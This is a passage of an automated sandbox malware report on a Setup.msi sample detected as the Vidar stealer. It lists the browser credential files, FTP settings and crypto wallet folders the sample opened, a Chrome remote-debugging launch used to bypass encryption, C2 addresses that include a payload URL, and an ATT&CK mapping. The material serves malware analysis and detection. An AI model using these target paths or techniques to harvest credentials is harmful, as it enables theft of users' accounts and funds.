            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Exodus\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Binance\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
            Source: Corrections.comBinary or memory string: WIN_81
            Source: Corrections.comBinary or memory string: WIN_XP
            Source: Appeals.16.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Corrections.comBinary or memory string: WIN_XPe
            Source: Corrections.comBinary or memory string: WIN_VISTA
            Source: Corrections.comBinary or memory string: WIN_7
            Source: Corrections.comBinary or memory string: WIN_8
            Source: Yara matchFile source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Corrections.com PID: 7808, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Attempt to bypass Chrome Application-Bound Encryption
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Yara detected Vidar stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Corrections.com PID: 7808, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FC2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,26_2_00FC2263
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FC1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,26_2_00FC1C61

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information12
            Scripting            		2
            Valid Accounts            		1
            Windows Management Instrumentation            		12
            Scripting            		1
            Exploitation for Privilege Escalation            		2
            Disable or Modify Tools            		2
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomains1
            Replication Through Removable Media            		2
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		11
            Peripheral Device Discovery            		Remote Desktop Protocol4
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell            		2
            Valid Accounts            		1
            Extra Window Memory Injection            		2
            Obfuscated Files or Information            		Security Account Manager1
            Account Discovery            		SMB/Windows Admin Shares21
            Input Capture            		1
            Remote Access Software            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Registry Run Keys / Startup Folder            		2
            Valid Accounts            		1
            DLL Side-Loading            		NTDS3
            File and Directory Discovery            		Distributed Component Object Model3
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            File Deletion            		LSA Secrets48
            System Information Discovery            		SSHKeylogging114
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
            Process Injection            		1
            Extra Window Memory Injection            		Cached Domain Credentials341
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Registry Run Keys / Startup Folder            		232
            Masquerading            		DCSync131
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Valid Accounts            		Proc Filesystem4
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadow11
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
            Access Token Manipulation            		Network Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
            Process Injection            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576875 Sample: Setup.msi Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 100 t.me 2->100 102 sedone.online 2->102 104 pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ 2->104 118 Suricata IDS alerts for network traffic 2->118 120 Found malware configuration 2->120 122 Antivirus detection for URL or domain 2->122 124 9 other signatures 2->124 13 cmd.exe 3 2->13         started        17 msiexec.exe 87 34 2->17         started        19 msiexec.exe 12 2->19         started        21 svchost.exe 2->21         started        signatures3 process4 dnsIp5 90 2 other malicious files 13->90 dropped 144 Command shell drops VBS files 13->144 24 cscript.exe 2 13->24         started        27 conhost.exe 13->27         started        29 certutil.exe 8 2 13->29         started        78 C:\Windows\Installer\MSI64FB.tmp, PE32+ 17->78 dropped 80 C:\Windows\Installer\MSI619D.tmp, PE32 17->80 dropped 82 C:\Windows\Installer\MSI614E.tmp, PE32 17->82 dropped 92 2 other malicious files 17->92 dropped 146 Creates an undocumented autostart registry key 17->146 148 Drops executables to the windows directory (C:\Windows) and starts them 17->148 31 msiexec.exe 17->31         started        33 msiexec.exe 17->33         started        35 MSI64FB.tmp 17->35         started        84 C:\Users\user\AppData\Local\...\MSIB1E4.tmp, PE32 19->84 dropped 86 C:\Users\user\AppData\Local\...\MSIB1A5.tmp, PE32 19->86 dropped 88 C:\Users\user\AppData\Local\...\MSIAFB0.tmp, PE32 19->88 dropped 94 4 other malicious files 19->94 dropped 108 127.0.0.1 unknown unknown 21->108 file6 signatures7 process8 signatures9 140 Bypasses PowerShell execution policy 24->140 37 powershell.exe 43 24->37         started        process10 dnsIp11 110 138.124.60.133, 49738, 80 NOKIA-ASFI Norway 37->110 72 C:\Users\user\AppData\Local\Temp\putt.exe, PE32 37->72 dropped 74 C:\Users\user\AppData\Local\...\lem[1].exe, PE32 37->74 dropped 126 Found many strings related to Crypto-Wallets (likely being stolen) 37->126 128 Loading BitLocker PowerShell Module 37->128 130 Powershell drops PE file 37->130 42 putt.exe 26 37->42         started        45 WmiPrvSE.exe 2 37->45         started        47 conhost.exe 37->47         started        file12 signatures13 process14 signatures15 142 Multi AV Scanner detection for dropped file 42->142 49 cmd.exe 42->49         started        process16 file17 70 C:\Users\user\AppData\...\Corrections.com, PE32 49->70 dropped 116 Drops PE files with a suspicious file extension 49->116 53 Corrections.com 49->53         started        58 conhost.exe 49->58         started        60 tasklist.exe 49->60         started        62 7 other processes 49->62 signatures18 process19 dnsIp20 112 t.me 149.154.167.99, 443, 49756 TELEGRAMRU United Kingdom 53->112 114 sedone.online 116.203.12.114, 443, 49764, 49773 HETZNER-ASDE Germany 53->114 76 C:\ProgramData\37QQIEKNGVAA\QQ9RQQ, PE32+ 53->76 dropped 132 Attempt to bypass Chrome Application-Bound Encryption 53->132 134 Found many strings related to Crypto-Wallets (likely being stolen) 53->134 136 Found API chain indicative of sandbox detection 53->136 138 4 other signatures 53->138 64 chrome.exe 53->64         started        file21 signatures22 process23 dnsIp24 96 192.168.2.4, 138, 443, 49465 unknown unknown 64->96 98 239.255.255.250 unknown Reserved 64->98 67 chrome.exe 64->67         started        process25 dnsIp26 106 www.google.com 142.250.181.100, 443, 49814, 49815 GOOGLEUS United States 67->106

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Setup.msi0%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\37QQIEKNGVAA\QQ9RQQ0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe37%ReversingLabsWin32.Ransomware.Vidar
            C:\Users\user\AppData\Local\Temp\628056\Corrections.com0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSIAE63.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSIAF01.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSIAF50.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSIAF80.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSIAFB0.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSIB1A5.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\MSIB1E4.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\putt.exe37%ReversingLabsWin32.Ransomware.Vidar
            C:\Windows\Installer\MSI60C0.tmp0%ReversingLabs
            C:\Windows\Installer\MSI614E.tmp0%ReversingLabs
            C:\Windows\Installer\MSI619D.tmp0%ReversingLabs
            C:\Windows\Installer\MSI64FB.tmp0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://138.124.60.180%Avira URL Cloudsafe
            http://138.124.60.133/lem.e80%Avira URL Cloudsafe
            http://138.124.60.133/lem.exe0%Avira URL Cloudsafe
            http://138.124.60.133/lem80%Avira URL Cloudsafe
            http://138.124.60.133/80%Avira URL Cloudsafe
            https://sedone.online.ioming0%Avira URL Cloudsafe
            http://138.80%Avira URL Cloudsafe
            https://sedone.online/emp100%Avira URL Cloudmalware
            http://138.124.60.80%Avira URL Cloudsafe
            http://138.124.60.1380%Avira URL Cloudsafe
            https://sedone.onlineNGVAA0%Avira URL Cloudsafe
            http://138.124.60.133/lem.ex80%Avira URL Cloudsafe
            http://138.124.60.133/lem.80%Avira URL Cloudsafe
            http://138.124.60.133/l80%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            t.me
            		149.154.167.99
            		truefalse
              		high
              www.google.com
              		142.250.181.100
              		truefalse
                		high
                sedone.online
                		116.203.12.114
                		truefalse
                  		high
                  pVoxsPTUpvXHtTiZ.pVoxsPTUpvXHtTiZ
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://138.124.60.133/lem.exefalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabCorrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drfalse
                      		high
                      https://duckduckgo.com/ac/?q=Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drfalse
                        		high
                        http://anglebug.com/4633chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://anglebug.com/7382chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drfalse
                              		high
                              https://issuetracker.google.com/284462263chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://polymer.github.io/AUTHORS.txtchrome.exe, 0000001D.00000003.2537105899.0000600400FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535849991.00006004010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2536965697.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535422475.0000600401048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537060413.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537022593.00006004007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535958699.0000600401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535883119.0000600400F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2535811313.0000600401058000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://docs.google.com/chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/Prod.C:edb.log.30.drfalse
                                          		high
                                          https://anglebug.com/7714chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://anglebug.com/6248chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://anglebug.com/6929chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://anglebug.com/5281chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.2082140205.0000017A00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000001E.00000003.2517110348.000001DA28FB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drfalse
                                                            		high
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drfalse
                                                              		high
                                                              http://138.124.60.133/8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://issuetracker.google.com/255411748chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://138.124.60.133/lem.e8powershell.exe, 00000009.00000002.2082140205.0000017A00FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
